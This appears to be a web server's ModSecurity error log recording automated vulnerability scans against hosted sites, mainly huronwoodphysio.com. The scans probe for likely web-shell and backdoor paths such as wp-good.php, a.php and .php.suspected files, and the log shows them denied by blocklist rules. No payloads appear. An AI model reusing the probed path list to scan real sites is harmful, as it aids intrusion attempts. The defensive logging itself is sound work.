[Tue May 26 14:22:31.926781 2026] [security2:error] [pid 606909:tid 607154] [client 20.226.60.108:22390] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/a.php"] [unique_id "ahVfT10yRtX9qA7aVUVZnwAAAPg"]
[Tue May 26 14:22:32.281112 2026] [security2:error] [pid 606909:tid 607073] [client 20.226.60.108:42358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/chosen.php"] [unique_id "ahVfUF0yRtX9qA7aVUVZqAAAAKc"]
[Tue May 26 14:22:32.281225 2026] [security2:error] [pid 606909:tid 607073] [client 20.226.60.108:42358] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/chosen.php"] [unique_id "ahVfUF0yRtX9qA7aVUVZqAAAAKc"]
[Tue May 26 14:22:32.365778 2026] [security2:error] [pid 606909:tid 607085] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfT10yRtX9qA7aVUVZoQAAALM"]
[Tue May 26 14:22:32.647904 2026] [security2:error] [pid 606909:tid 607156] [client 20.226.60.108:19113] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/index.php"] [unique_id "ahVfUF0yRtX9qA7aVUVZtQAAAPo"]
[Tue May 26 14:22:32.648012 2026] [security2:error] [pid 606909:tid 607156] [client 20.226.60.108:19113] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-content/index.php"] [unique_id "ahVfUF0yRtX9qA7aVUVZtQAAAPo"]
[Tue May 26 14:22:33.117654 2026] [security2:error] [pid 606909:tid 607092] [client 20.226.60.108:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "huronwoodphysio.com"] [uri "/index.php"] [unique_id "ahVfUV0yRtX9qA7aVUVZugAAALo"]
[Tue May 26 14:22:33.117692 2026] [security2:error] [pid 606909:tid 607092] [client 20.226.60.108:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "huronwoodphysio.com"] [uri "/index.php"] [unique_id "ahVfUV0yRtX9qA7aVUVZugAAALo"]
[Tue May 26 14:22:33.120580 2026] [security2:error] [pid 606909:tid 607070] [client 20.226.60.108:22363] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "huronwoodphysio.com"] [uri "/admin/controller/extension/"] [unique_id "ahVfUV0yRtX9qA7aVUVZuAAAAKQ"]
[Tue May 26 14:22:33.312603 2026] [security2:error] [pid 606909:tid 607163] [client 4.201.75.230:5441] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/xmlrpc.php"] [unique_id "ahVfUV0yRtX9qA7aVUVZvQAAAQE"]
[Tue May 26 14:22:33.647891 2026] [security2:error] [pid 606909:tid 607118] [client 20.226.60.108:22363] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wap.php"] [unique_id "ahVfUV0yRtX9qA7aVUVZzQAAANQ"]
[Tue May 26 14:22:33.648048 2026] [security2:error] [pid 606909:tid 607118] [client 20.226.60.108:22363] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wap.php"] [unique_id "ahVfUV0yRtX9qA7aVUVZzQAAANQ"]
[Tue May 26 14:22:33.797793 2026] [security2:error] [pid 606909:tid 607151] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfUV0yRtX9qA7aVUVZxgAAAPU"]
[Tue May 26 14:22:34.020766 2026] [security2:error] [pid 606909:tid 607154] [client 20.226.60.108:14404] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-admin/wp.php"] [unique_id "ahVfUl0yRtX9qA7aVUVZ1AAAAPg"]
[Tue May 26 14:22:34.020897 2026] [security2:error] [pid 606909:tid 607154] [client 20.226.60.108:14404] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-admin/wp.php"] [unique_id "ahVfUl0yRtX9qA7aVUVZ1AAAAPg"]
[Tue May 26 14:22:34.384232 2026] [security2:error] [pid 606909:tid 607096] [client 20.226.60.108:46641] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/aa.php"] [unique_id "ahVfUl0yRtX9qA7aVUVZ4wAAAL4"]
[Tue May 26 14:22:34.384350 2026] [security2:error] [pid 606909:tid 607096] [client 20.226.60.108:46641] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/aa.php"] [unique_id "ahVfUl0yRtX9qA7aVUVZ4wAAAL4"]
[Tue May 26 14:22:34.384518 2026] [security2:error] [pid 606909:tid 607050] [client 20.206.67.134:3363] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVfUl0yRtX9qA7aVUVZ5AAAAJA"]
[Tue May 26 14:22:34.741116 2026] [security2:error] [pid 606909:tid 607099] [client 20.226.60.108:22374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/bolt.php"] [unique_id "ahVfUl0yRtX9qA7aVUVZ7QAAAME"]
[Tue May 26 14:22:34.741245 2026] [security2:error] [pid 606909:tid 607099] [client 20.226.60.108:22374] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/bolt.php"] [unique_id "ahVfUl0yRtX9qA7aVUVZ7QAAAME"]
[Tue May 26 14:22:35.101198 2026] [security2:error] [pid 606909:tid 607091] [client 20.226.60.108:22350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/bthil.php"] [unique_id "ahVfU10yRtX9qA7aVUVZ-QAAALk"]
[Tue May 26 14:22:35.101291 2026] [security2:error] [pid 606909:tid 607091] [client 20.226.60.108:22350] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/bthil.php"] [unique_id "ahVfU10yRtX9qA7aVUVZ-QAAALk"]
[Tue May 26 14:22:35.488229 2026] [cgid:error] [pid 606909:tid 607130] [client 20.226.60.108:0] AH01265: stderr from /home2/huron6a0/public_html/cgi-bin/: attempt to invoke directory as script
[Tue May 26 14:22:35.489000 2026] [security2:error] [pid 606909:tid 607130] [client 20.226.60.108:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "huronwoodphysio.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVfU10yRtX9qA7aVUVaBgAAAOA"]
[Tue May 26 14:22:35.489440 2026] [security2:error] [pid 606909:tid 607148] [client 20.226.60.108:39836] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "huronwoodphysio.com"] [uri "/cgi-bin/"] [unique_id "ahVfU10yRtX9qA7aVUVaBAAAAPI"]
[Tue May 26 14:22:35.653777 2026] [security2:error] [pid 606909:tid 607054] [client 114.119.155.224:53705] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "newdental.com.co"] [uri "/"] [unique_id "ahVfU10yRtX9qA7aVUVaCgAAAJQ"], referer: http://newdental.com.co/?ucci/6971870568877405l16a/fdddfg54870f.hulloa
[Tue May 26 14:22:35.671278 2026] [security2:error] [pid 606909:tid 607120] [client 20.226.60.108:39836] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/x.php"] [unique_id "ahVfU10yRtX9qA7aVUVaCwAAANY"]
[Tue May 26 14:22:35.671371 2026] [security2:error] [pid 606909:tid 607120] [client 20.226.60.108:39836] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/x.php"] [unique_id "ahVfU10yRtX9qA7aVUVaCwAAANY"]
[Tue May 26 14:22:36.036025 2026] [security2:error] [pid 606909:tid 607137] [client 20.226.60.108:46594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/index/function.php"] [unique_id "ahVfVF0yRtX9qA7aVUVaFAAAAOc"]
[Tue May 26 14:22:36.036161 2026] [security2:error] [pid 606909:tid 607137] [client 20.226.60.108:46594] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/index/function.php"] [unique_id "ahVfVF0yRtX9qA7aVUVaFAAAAOc"]
[Tue May 26 14:22:36.389400 2026] [security2:error] [pid 606909:tid 607096] [client 20.226.60.108:22389] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/aaa.php"] [unique_id "ahVfVF0yRtX9qA7aVUVaHwAAAL4"]
[Tue May 26 14:22:36.389534 2026] [security2:error] [pid 606909:tid 607096] [client 20.226.60.108:22389] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/aaa.php"] [unique_id "ahVfVF0yRtX9qA7aVUVaHwAAAL4"]
[Tue May 26 14:22:36.458961 2026] [security2:error] [pid 606909:tid 607164] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfVF0yRtX9qA7aVUVaFQAAAQI"]
[Tue May 26 14:22:36.746593 2026] [security2:error] [pid 606909:tid 607079] [client 20.226.60.108:14497] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/abcd.php"] [unique_id "ahVfVF0yRtX9qA7aVUVaKwAAAK0"]
[Tue May 26 14:22:36.746751 2026] [security2:error] [pid 606909:tid 607079] [client 20.226.60.108:14497] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/abcd.php"] [unique_id "ahVfVF0yRtX9qA7aVUVaKwAAAK0"]
[Tue May 26 14:22:37.111486 2026] [security2:error] [pid 606909:tid 607149] [client 20.226.60.108:60649] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-good.php"] [unique_id "ahVfVV0yRtX9qA7aVUVaLAAAAPM"]
[Tue May 26 14:22:37.111649 2026] [security2:error] [pid 606909:tid 607149] [client 20.226.60.108:60649] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-good.php"] [unique_id "ahVfVV0yRtX9qA7aVUVaLAAAAPM"]
[Tue May 26 14:22:37.462565 2026] [security2:error] [pid 606909:tid 607145] [client 20.226.60.108:39824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/edit-tags.php"] [unique_id "ahVfVV0yRtX9qA7aVUVaPQAAAO8"]
[Tue May 26 14:22:37.462678 2026] [security2:error] [pid 606909:tid 607145] [client 20.226.60.108:39824] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/edit-tags.php"] [unique_id "ahVfVV0yRtX9qA7aVUVaPQAAAO8"]
[Tue May 26 14:22:37.825935 2026] [security2:error] [pid 606909:tid 607059] [client 20.226.60.108:19077] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/themes/admin.php"] [unique_id "ahVfVV0yRtX9qA7aVUVaRgAAAJk"]
[Tue May 26 14:22:37.826045 2026] [security2:error] [pid 606909:tid 607059] [client 20.226.60.108:19077] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-content/themes/admin.php"] [unique_id "ahVfVV0yRtX9qA7aVUVaRgAAAJk"]
[Tue May 26 14:22:38.188976 2026] [security2:error] [pid 606909:tid 607075] [client 20.226.60.108:46637] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/a7.php"] [unique_id "ahVfVl0yRtX9qA7aVUVaUAAAAKk"]
[Tue May 26 14:22:38.189121 2026] [security2:error] [pid 606909:tid 607075] [client 20.226.60.108:46637] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/a7.php"] [unique_id "ahVfVl0yRtX9qA7aVUVaUAAAAKk"]
[Tue May 26 14:22:38.482776 2026] [security2:error] [pid 606909:tid 607158] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfVl0yRtX9qA7aVUVaTwAAAPw"]
[Tue May 26 14:22:38.567249 2026] [autoindex:error] [pid 606909:tid 607049] [client 20.226.60.108:0] AH01276: Cannot serve directory /home2/huron6a0/public_html/wp-content/uploads/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:22:38.568306 2026] [security2:error] [pid 606909:tid 607049] [client 20.226.60.108:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "huronwoodphysio.com"] [uri "/cgi-sys/403.html"] [unique_id "ahVfVl0yRtX9qA7aVUVaVwAAAI8"]
[Tue May 26 14:22:38.576049 2026] [security2:error] [pid 606909:tid 607050] [client 20.226.60.108:22395] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "huronwoodphysio.com"] [uri "/wp-content/uploads/"] [unique_id "ahVfVl0yRtX9qA7aVUVaVQAAAJA"]
[Tue May 26 14:22:38.752487 2026] [security2:error] [pid 606909:tid 607098] [client 20.226.60.108:22395] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-includes/Requests/library/index.php"] [unique_id "ahVfVl0yRtX9qA7aVUVaWQAAAMA"]
[Tue May 26 14:22:38.752655 2026] [security2:error] [pid 606909:tid 607098] [client 20.226.60.108:22395] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-includes/Requests/library/index.php"] [unique_id "ahVfVl0yRtX9qA7aVUVaWQAAAMA"]
[Tue May 26 14:22:38.851480 2026] [security2:error] [pid 606909:tid 607112] [client 202.141.83.254:53765] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfVl0yRtX9qA7aVUVaXgAAAM4"]
[Tue May 26 14:22:38.852015 2026] [security2:error] [pid 606909:tid 607112] [client 202.141.83.254:53765] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfVl0yRtX9qA7aVUVaXgAAAM4"]
[Tue May 26 14:22:39.119597 2026] [security2:error] [pid 606909:tid 607046] [client 20.226.60.108:22349] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/themes/index.php"] [unique_id "ahVfV10yRtX9qA7aVUVaaAAAAIw"]
[Tue May 26 14:22:39.119741 2026] [security2:error] [pid 606909:tid 607046] [client 20.226.60.108:22349] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-content/themes/index.php"] [unique_id "ahVfV10yRtX9qA7aVUVaaAAAAIw"]
[Tue May 26 14:22:39.484581 2026] [security2:error] [pid 606909:tid 607081] [client 20.226.60.108:46593] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/NewFile.php"] [unique_id "ahVfV10yRtX9qA7aVUVadAAAAK8"]
[Tue May 26 14:22:39.484754 2026] [security2:error] [pid 606909:tid 607081] [client 20.226.60.108:46593] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/NewFile.php"] [unique_id "ahVfV10yRtX9qA7aVUVadAAAAK8"]
[Tue May 26 14:22:39.524565 2026] [security2:error] [pid 606909:tid 607084] [client 20.206.67.134:3202] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVfV10yRtX9qA7aVUVadQAAALI"]
[Tue May 26 14:22:39.850263 2026] [security2:error] [pid 606909:tid 607122] [client 20.226.60.108:11202] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-Blogs.php"] [unique_id "ahVfV10yRtX9qA7aVUVagAAAANg"]
[Tue May 26 14:22:39.850364 2026] [security2:error] [pid 606909:tid 607122] [client 20.226.60.108:11202] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-Blogs.php"] [unique_id "ahVfV10yRtX9qA7aVUVagAAAANg"]
[Tue May 26 14:22:40.067125 2026] [security2:error] [pid 606909:tid 607047] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfV10yRtX9qA7aVUVaewAAAI0"]
[Tue May 26 14:22:40.204540 2026] [security2:error] [pid 606909:tid 607062] [client 20.226.60.108:46634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-includes/fonts/index.php"] [unique_id "ahVfWF0yRtX9qA7aVUVakgAAAJw"]
[Tue May 26 14:22:40.204675 2026] [security2:error] [pid 606909:tid 607062] [client 20.226.60.108:46634] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/wp-includes/fonts/index.php"] [unique_id "ahVfWF0yRtX9qA7aVUVakgAAAJw"]
[Tue May 26 14:22:40.569759 2026] [security2:error] [pid 606909:tid 607123] [client 20.226.60.108:42356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.60.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/themes.php"] [unique_id "ahVfWF0yRtX9qA7aVUVangAAANk"]
[Tue May 26 14:22:40.569846 2026] [security2:error] [pid 606909:tid 607123] [client 20.226.60.108:42356] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "huronwoodphysio.com"] [uri "/themes.php"] [unique_id "ahVfWF0yRtX9qA7aVUVangAAANk"]
[Tue May 26 14:22:40.989484 2026] [autoindex:error] [pid 606909:tid 607156] [client 20.226.60.108:22342] AH01276: Cannot serve directory /home2/huron6a0/public_html/wp-admin/js/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
